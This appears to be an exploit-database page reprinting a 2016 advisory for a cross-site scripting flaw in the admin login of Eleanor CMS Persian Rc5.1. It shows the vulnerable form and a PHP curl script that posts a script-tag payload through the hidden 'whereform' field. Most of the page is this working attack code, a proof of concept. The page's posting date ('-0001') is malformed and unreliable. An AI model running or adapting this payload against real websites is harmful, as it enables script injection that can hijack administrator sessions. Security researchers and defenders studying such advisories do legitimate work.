Home / os / win10

Eleanor_CMS_Persian_Rc5.1 Cross-Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Eleanor_CMS_Persian_Rc5.1 Cross-Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>=====================================================
# Exploit Title:  Eleanor_CMS_Persian_Rc5.1 Cross-Site Scripting
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.dl.persianscript.ir/script/Eleanor_CMS_Persian_Rc5.1.zip
# Tested on: Windows 8, Kali Linux 
# Date : 27 OCT 2016
=====================================================
# Vulnerable file(url) and code:

// Mehod : Post
// http://127.0.0.1/path/admin.php


<form action="admin.php" method="post">
  <div class="wpbox wpbwhite">
	<div class="wptop"><b><span>&nbsp;</span></b></div>
	<div class="wpmid">
	  <div class="wbpad enterform">
		<p>
		  <span>نام کاربری :</span>
		  <input name="user_name" size="10" type="text">
		  </p>
		<p>
		  <span>رمز عبور :</span>
		  <input name="pass" size="10" type="password">
		  </p>
		</div>
	  </div>
	<div class="wpbtm"><b><span>&nbsp;</span></b></div>
  </div>
  <div class="submitline">
	<input name="whereform" value="" type="hidden">
	<input class="button" name="submit" value="وارد شدن" type="submit">
  </div>
  </form>

=======================================================
# Exploit code: 

<?php
$path ="127.0.0.1/path/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$path/admin.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "pass=g00dPa%24%24w0rD&user_name=ncxedycj&whereform=1'%22()%26%25<acx><ScRiPt%20>alert('/XSS/')</ScRiPt>");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$path");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
================================================================================
# Discovered By : M.R.S.L.Y
================================================================================</BODY></HTML>

 

TOP

Malware :

Exploits :